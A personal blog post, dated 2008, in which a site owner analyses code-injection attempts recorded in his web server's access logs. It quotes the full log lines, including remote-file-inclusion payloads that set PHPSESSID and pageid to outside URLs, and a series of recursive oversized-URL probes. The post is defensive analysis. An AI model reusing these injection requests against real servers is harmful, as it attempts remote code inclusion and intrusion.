Yet Another Website Code-Injection Hacking Attempt
Posted by Hans de Ruiter
This will probably be one of the last blog entries related to code injection hacking attempts on this website. A pattern has emerged, and, until some new form of attack occurs, there simply is no point in mentioning every slight variation. Yesterday three nearly identical hacking attempts occurred from three different addresses. These attacks appeared to try and mask what was being performed somewhat. As usual, the tell-tale sign is the addition of other website URLs in the URL:
85.119.217.230 - - [06/Aug/2008:23:52:32 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:33 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fwww.vlopezalvarez.com%2FPersonal%2FFotos%2FViajes%2Fxaj%2Fupahebu%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:34 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fwww.clubnataciotortosa.com%2FUserFiles%2FMedia%2Fulagoh%2Flivacoz%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
The attack hopes that parsing of the PHP session ID has a flaw that can be exploited. What is also interesting is that these latest string of attempts to breach website security spoof as Internet Explorer 7.0 (IE7). To make sure that this is not a flaw in internet explorer, I visited this site using IE7, and it functioned perfectly normally. These three accesses with invalid PHPSESSID's occur within a string of other accesses with perfectly normal PHPSESSIDs. The only tell-tale sign that it is not a human performing the accesses is that every page is accessed within a second or two from the previous access. For reference, the full set of accesses for one of these attacks is:
85.119.217.230 - - [06/Aug/2008:23:52:32 -0400] "GET / HTTP/1.0" 200 21686 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:32 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:33 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fwww.vlopezalvarez.com%2FPersonal%2FFotos%2FViajes%2Fxaj%2Fupahebu%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:34 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fwww.clubnataciotortosa.com%2FUserFiles%2FMedia%2Fulagoh%2Flivacoz%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:35 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:41 -0400] "GET /amiga-os-4-projects/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 11037 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:43 -0400] "GET /about-me/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 12579 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:44 -0400] "GET /index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 404 8481 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:48 -0400] "GET /website-hacking-attempts/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 19069 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:51 -0400] "GET /PageComment/rss?pageid=http%3A%2F%2Fwww.interkonet.com%2Fgaleria%2Fmodules%2Falbumselect%2Fucu%2Fiwuy%2F HTTP/1.0" 200 157 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:51 -0400] "GET /PageComment/rss?pageid=http%3A%2F%2Fwww.antwerpsupporter.be%2Fmvdm_polls%2Fincludeold%2Folom%2Fyeq%2F HTTP/1.0" 200 157 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:52 -0400] "GET /PageComment/rss?pageid=http%3A%2F%2Fwww.boomerbible.com%2Finstapunk%2FMType%2Farchives%2Fajuq%2Fevuji%2F HTTP/1.0" 200 157 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:54 -0400] "GET /fishing-for-administrator-pages-a-break-in-attempt/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 20370 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:55 -0400] "GET /projects/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 9273 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:02 -0400] "GET /free-ideas/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15448 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:03 -0400] "GET /want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 14733 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:04 -0400] "GET /amiga-os-4-projects/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 11037 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:06 -0400] "GET /about-me/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 12579 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:07 -0400] "GET /PageComment/rss?pageid=92 HTTP/1.0" 200 157 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:09 -0400] "GET /website-hacking-attempts/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 19069 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:11 -0400] "GET /blog/tag/monthly+review?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 18706 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:15 -0400] "GET /blog/tag/website+promotion?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 32918 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:17 -0400] "GET /projects/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 9273 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:18 -0400] "GET /projects/amiga-os-4-projects/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 9273 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:19 -0400] "GET /free-ideas/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15448 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:23 -0400] "GET /want-to-help/want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15013 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:25 -0400] "GET /month-in-review/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 21152 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:27 -0400] "GET /a-visit-from-technorati/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 19418 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:28 -0400] "GET /projects/amiga-os-4-projects/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 9273 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:29 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:31 -0400] "GET /month-in-review/the-first-content/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 21152 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:33 -0400] "GET /a-visit-from-technorati/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 19418 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:38 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15833 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:39 -0400] "GET /month-in-review/the-first-content/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 21152 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:40 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 16568 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:43 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15758 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:45 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 17013 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:46 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 16798 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:47 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 19093 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:48 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 403 1872 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
The last few accesses are also unusual. The URL recursively attempts to access the same directory. This could be a bug; however, I cannot replicate this using IE7. Another possibility is that the limits of the web-server's URL length is being assessed, along with the server's response. This page mentions the possibility of using an oversized URL in order to induce a buffer overflow. Fortunately the web-server software run by the hosting provider for this website does not have such a vulnerability.
Blog » Yet Another Website Code-Injection Hacking Attempt
Post your comment
Comments
-
The admin of this site can be contacted via the email addresses listed on the contact page (http://hdrlab.org.nz/contact-me/).
Posted by Hans, 03/10/2008 11:24am (16 years ago)
-
How i may contact admin this site? I have a question.
iijiiveiPosted by datbiacterb, 02/10/2008 7:16pm (16 years ago)
-
Pretty nice site, wants to see much more on it! :)
Posted by John Williams, 20/08/2008 3:56pm (16 years ago)
RSS feed for comments on this page | RSS feed for all comments
Blog » Yet Another Website Code-Injection Hacking Attempt